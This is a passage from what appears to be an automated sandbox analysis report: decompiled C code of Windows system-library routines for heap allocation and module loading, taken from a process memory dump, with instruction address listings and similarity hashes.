									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x50b7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E050037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x50b7b9c; // 0x0
									_t214 = L04FE4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E050037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x50b7b10 =  *0x50b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x50b7b04 =  *0x50b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04FE77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04FE77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x50b7b08 =  *0x50b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E050057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0500F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04FE77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04FFA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04FE77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E050096C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x04fd849b
0x04fd849b
0x04fd849b
0x04fd849b
0x04fd849d
0x04fd84a2
0x04fd84a7
0x04fd84b1
0x04fd84d8
0x00000000
0x04fd84b3
0x04fd84c4
0x04fd84c9
0x04fd84cd
0x04fd84cf
0x04fd84cf
0x04fd84d6
0x04fd84e6
0x04fd84e9
0x04fd84ec
0x04fd84ef
0x04fd84f2
0x04fd84f4
0x04fd84fc
0x04fd8501
0x04fd8506
0x04fd8509
0x04fd86e0
0x04fd86e5
0x04fd86e8
0x04fd86ed
0x04fd86f0
0x04fd86f2
0x05029afd
0x05029b02
0x04fd84da
0x04fd84df
0x04fd84df
0x04fd86fa
0x04fd86fd
0x04fd86fe
0x04fd8701
0x04fd8706
0x04fd8709
0x04fd870b
0x00000000
0x00000000
0x04fd8711
0x04fd8725
0x04fd8727
0x04fd872a
0x04fd872c
0x05029af0
0x05029af5
0x04fd8732
0x04fd8732
0x04fd8732
0x04fd8735
0x04fd8737
0x04fd8515
0x04fd8515
0x04fd8518
0x04fd851d
0x04fd8523
0x04fd8527
0x04fd852b
0x04fd8537
0x04fd8539
0x04fd853c
0x04fd853e
0x04fd868c
0x04fd8691
0x04fd8699
0x04fd869b
0x04fd8744
0x04fd8748
0x04fd86a1
0x04fd86a1
0x04fd86a1
0x04fd86a4
0x04fd86a8
0x05029bdf
0x05029bdf
0x04fd86ae
0x04fd86b0
0x00000000
0x04fd86b6
0x00000000
0x05029be9
0x04fd86b0
0x04fd8544
0x04fd854a
0x04fd854d
0x04fd8551
0x04fd876e
0x04fd8778
0x04fd877b
0x04fd8780
0x04fd8557
0x04fd8557
0x04fd855d
0x04fd855d
0x04fd856b
0x04fd856e
0x04fd8570
0x04fd8573
0x04fd8576
0x04fd8576
0x04fd8579
0x04fd857b
0x00000000
0x00000000
0x04fd8581
0x04fd85a0
0x04fd85a2
0x04fd85a5
0x04fd85a7
0x05029b1b
0x05029b1b
0x04fd862e
0x04fd862e
0x04fd8631
0x04fd8631
0x04fd8634
0x04fd8636
0x04fd8669
0x04fd8669
0x04fd866b
0x05029bbf
0x05029bc4
0x05029bc8
0x05029bce
0x05029bce
0x04fd8671
0x04fd8671
0x04fd8674
0x04fd8676
0x05029bae
0x05029bae
0x04fd8676
0x04fd867c
0x04fd867e
0x04fd8688
0x04fd8688
0x00000000
0x04fd867e
0x04fd8638
0x04fd8638
0x04fd863b
0x04fd863e
0x04fd863f
0x04fd8642
0x04fd8645
0x04fd8648
0x04fd864d
0x05029b69
0x05029b6e
0x05029b7b
0x05029b81
0x05029b85
0x05029b89
0x05029ba7
0x05029b8b
0x05029b91
0x05029b9a
0x05029b9f
0x05029b9f
0x04fd8788
0x04fd878d
0x04fd8763
0x04fd8763
0x04fd8766
0x00000000
0x04fd8766
0x05029b70
0x00000000
0x05029b70
0x04fd8656
0x04fd865a
0x04fd865c
0x04fd8752
0x04fd8756
0x00000000
0x00000000
0x04fd875e
0x00000000
0x04fd875e
0x04fd8662
0x04fd8662
0x04fd8662
0x04fd8666
0x00000000
0x04fd8666
0x04fd85b7
0x04fd85b9
0x04fd85bc
0x04fd85bf
0x04fd85cc
0x04fd85d1
0x04fd85d4
0x04fd85db
0x04fd85de
0x04fd85e0
0x05029b5f
0x00000000
0x05029b5f
0x04fd85e6
0x04fd85ea
0x04fd86c3
0x04fd86c5
0x04fd86c8
0x04fd86ca
0x05029b16
0x00000000
0x05029b16
0x04fd86d6
0x04fd85f6
0x04fd85f6
0x04fd85f9
0x04fd8602
0x04fd8606
0x04fd860a
0x04fd860b
0x04fd860e
0x04fd8611
0x00000000
0x04fd8611
0x04fd85f3
0x00000000
0x04fd85f3
0x04fd8619
0x04fd861e
0x04fd861e
0x04fd8621
0x04fd8622
0x04fd8623
0x04fd8625
0x04fd862c
0x00000000
0x04fd873d
0x00000000
0x04fd873d
0x04fd8737
0x04fd850f
0x04fd8512
0x00000000
0x04fd8512
0x00000000
0x04fd84d6

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d70698405a762150a5990b1d5540d89c499a324da030e6cb25d2c601745e3ef2
Instruction ID: 891c4f2c531b5cef8067805c6a88771a8cc4732741ee857c88e707093a682d20
Opcode Fuzzy Hash: d70698405a762150a5990b1d5540d89c499a324da030e6cb25d2c601745e3ef2
Instruction Fuzzy Hash: CEB18C71E00209DFDB19EF99D984AEEBBBAFF48344F144529E415AB241EB70AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04FF513A, Relevance: .3, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04FF513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x50bd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E0500D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04FE2280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L04FE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04FE4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0500F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E04FDFFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x50bb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0500B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x04ff5142
0x04ff514c
0x04ff5150
0x04ff5157
0x04ff5159
0x04ff515e
0x04ff5165
0x04ff5169
0x04ff516c
0x04ff5172
0x04ff5176
0x04ff517a
0x04ff517a
0x04ff517a
0x04ff517f
0x05036d8b
0x05036d8e
0x05036d91
0x05036d95
0x05036d98
0x05036d9c
0x05036da0
0x05036da3
0x05036da7
0x05036e26
0x05036e26
0x05036e2a
0x04ff51f9
0x04ff51f9
0x04ff51fe
0x05036e33
0x05036e33
0x05036e39
0x05036e3d
0x05036e46
0x05036e50
0x00000000
0x00000000
0x05036e52
0x05036e53
0x05036e56
0x05036e5d
0x00000000
0x00000000
0x00000000
0x05036e5f
0x05036e67
0x05036e77
0x05036e7f
0x05036e80
0x05036e88
0x05036e90
0x05036e9f
0x05036ea5
0x05036ea9
0x05036eb1
0x05036ebf
0x00000000
0x00000000
0x05036ecf
0x05036ed3
0x00000000
0x00000000
0x05036edb
0x05036ede
0x05036ee1
0x05036ee8
0x05036eeb
0x05036eed
0x05036ef0
0x05036ef4
0x05036ef8
0x05036efc
0x00000000
0x00000000
0x05036f0d
0x05036f11
0x05036f32
0x05036f37
0x05036f3b
0x05036f3e
0x05036f41
0x05036f46
0x00000000
0x00000000
0x05036f4c
0x05036f50
0x05036f50
0x05036f54
0x05036f62
0x05036f65
0x05036f6d
0x05036f7b
0x05036f7b
0x05036f93
0x05036f98
0x05036fa0
0x05036fa6
0x05036fb3
0x05036fb6
0x05036fbf
0x05036fc1
0x05036fd5
0x05036fda
0x05036fda
0x05036fdd
0x05036fe2
0x05036fe7
0x05036feb
0x05036fef
0x05036ff3
0x04ff520c
0x04ff520c
0x04ff520f
0x04ff5215
0x04ff5234
0x04ff523a
0x04ff523a
0x04ff5244
0x04ff5245
0x04ff5246
0x04ff5251
0x04ff5251
0x05036f13
0x05036f17
0x05036f17
0x05036f18
0x05036f1b
0x05036f1f
0x05036f23
0x00000000
0x05036f28
0x04ff5204
0x04ff5204
0x04ff5208
0x00000000
0x04ff5208
0x04ff5185
0x04ff5188
0x04ff518a
0x04ff518e
0x04ff5195
0x05036db1
0x05036db5
0x05036db9
0x04ff519b
0x04ff519b
0x04ff519e
0x04ff51a7
0x04ff51a9
0x04ff51a9
0x04ff51b5
0x04ff51b8
0x04ff51bb
0x04ff51be
0x04ff51c1
0x04ff51c5
0x04ff51c9
0x04ff51cd
0x04ff51cd
0x04ff51d8
0x04ff51dc
0x04ff51e0
0x05036dcc
0x05036dd0
0x05036dd5
0x05036ddd
0x05036de1
0x05036de1
0x05036de5
0x05036deb
0x05036df1
0x05036df7
0x05036dfd
0x05036e01
0x05036e05
0x05036e09
0x05036e0d
0x05036e11
0x05036e11
0x04ff51eb
0x05036e1a
0x05036e1f
0x05036e21
0x05036e23
0x00000000
0x04ff51f1
0x04ff51f1
0x00000000
0x04ff51f1

Memory Dump Source

Source File: 00000006.00000002.569318591.0000000004FA0000.00000040.00000001.sdmp, Offset: 04FA0000, based on PE: true

Associated: 00000006.00000002.570095228.00000000050BB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.570132442.00000000050BF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13c21d55c757f139f09dec53377f02b0e14d56033d3694cd6a724047b09c4788
Instruction ID: 2dcce6c22105eca8381ae7c1b8b6fdd74295d37de28440405686b1cdab39b758
Opcode Fuzzy Hash: 13c21d55c757f139f09dec53377f02b0e14d56033d3694cd6a724047b09c4788
Instruction Fuzzy Hash: 7DC113756083809FD354CF68C581A6AFBE1FF88304F144A6EF9998B362D771E946CB42

Uniqueness

Uniqueness Score: -1.00%

Function 04FF03E2, Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E04FF03E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x50bd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E04FF0548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E0500B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E04FDB02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x50b7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E04FE7D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E04FE7D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E05047016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E05009830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E050469A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x50b7c04 != 0) {
						_t118 = _v12;
						_t120 = E0504A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x50b7bd8;
						if( *0x50b7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E050095D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E050099A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E05043540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E04FCB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E0500AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x50b8474 - 3;
										if( *0x50b8474 != 3) {
											 *0x50b79dc =  *0x50b79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E04FE7D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E04FE7D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E05047016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x50b8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x50b7b00; // 0x0
							asm("ror esi, cl");
							 *0x50bb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E050095D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E04FD7F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x04ff03f1
0x04ff03f7
0x04ff03f9
0x04ff03fb
0x04ff03fd
0x04ff0400
0x04ff040a
0x05034c7a
0x04ff0537
0x04ff0547
0x04ff0410
0x04ff0410
0x04ff0414
0x04ff0417
0x04ff041a
0x04ff0421
0x04ff0424
0x04ff042b
0x04ff043b
0x04ff043e
0x04ff043f
0x04ff043f
0x04ff0446
0x04ff0449
0x04ff044c
0x04ff044f
0x04ff0459
0x05034c8d
0x04ff045f
0x04ff045f
0x04ff045f
0x04ff0467
0x05034c97
0x05034c9d
0x05034ca4
0x05034caa
0x05034caf
0x05034cb1
0x05034cc3
0x05034cb3
0x05034cbc
0x05034cbc
0x05034cc8
0x05034ccb
0x05034cd7
0x05034cda
0x05034cdf
0x05034cdf
0x05034ccb
0x05034ca4
0x04ff046d
0x04ff046f
0x04ff046f
0x04ff0471
0x04ff0476
0x04ff047a
0x04ff047b
0x04ff0483
0x04ff0489
0x04ff048d
0x00000000
0x00000000
0x05034ce9
0x05034cef
0x05034d22
0x05034d22
0x00000000
0x05034d22
0x05034cf1
0x05034cf7
0x00000000
0x00000000
0x05034cf9
0x05034cff
0x00000000
0x00000000
0x05034d05
0x05034d07
0x00000000
0x00000000
0x05034d0d
0x05034d0f
0x05034d14
0x05034d16
0x00000000
0x00000000
0x05034d1c
0x05034d1c
0x04ff0499
0x04ff0535
0x04ff0535
0x00000000
0x04ff0535
0x04ff04a6
0x05034d2c
0x05034d37
0x05034d39
0x05034d3b
0x00000000
0x00000000
0x05034d41
0x05034d48
0x04ff0527
0x04ff052b
0x04ff052d
0x04ff0530
0x04ff0530
0x00000000
0x04ff052b
0x05034d4e
0x04ff04ac
0x04ff04ac
0x04ff04af
0x04ff04b2
0x04ff04b7
0x04ff04b9
0x04ff04bb
0x04ff04bd
0x04ff04bf
0x04ff04c5
0x04ff04c9
0x05034d53
0x05034d59
0x05034db9
0x05034dba
0x05034dbf
0x05034dc2
0x05034dc4
0x05034dc7
0x05034dce
0x00000000
0x05034dce
0x05034d5b
0x05034d61
0x00000000
0x00000000
0x05034d63
0x05034d69
0x00000000
0x00000000
0x05034d6b
0x05034d6e
0x05034d74
0x05034d76
